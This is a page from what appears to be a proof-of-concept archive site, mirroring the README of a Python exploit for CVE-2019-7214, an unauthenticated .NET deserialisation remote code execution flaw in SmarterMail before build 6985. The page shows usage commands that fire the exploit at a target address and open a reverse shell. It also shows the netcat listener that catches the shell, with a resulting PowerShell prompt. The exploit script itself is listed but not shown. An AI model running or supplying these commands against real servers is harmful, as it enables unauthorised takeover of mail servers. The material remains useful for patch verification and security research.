Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-7214 PoC — SmarterTools SmarterMail 代码问题漏洞

Source
https://github.com/Drew-Alleman/CVE-2019-7214
Associated Vulnerability
Title:SmarterTools SmarterMail 代码问题漏洞 (CVE-2019-7214)
Description:SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.
Description
Python3 Rewrite of SmarterMail < Build 6985 Remote Code Execution found by 1F98D (CVE-2019-7214)
Readme
## CVE-2019-7214
```
# Exploit Title: SmarterMail < Build 6985 Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Modified Author: Drew Alleman
# Date: 10 May 2020
# Vendor Hompage: https://www.smartertools.com/
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
# 
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
```

## Usage
### Sending the Exploit
```
$ python3 CVE-2019-7214.py -l 192.168.45.215 -r  192.168.111.65
[*] Attacking: tcp://192.168.111.65:17001/Servers
[*] Attempting to send exploit...
[*] Exploit sent! Check your shell at 192.168.45.215:4444
```

### Creating the Listener
NOTE: You will have to press enter once you see the `connect to xxx` message to actually start the shell. 
```
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.111.65] 49788

PS C:\Windows\system32> 
```
File Snapshot

 [4.0K]  /data/pocs/32e446d9ec8147f469eec739f2213add5f5c96dd
├── [9.3K]  CVE-2019-7214.py
└── [1.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →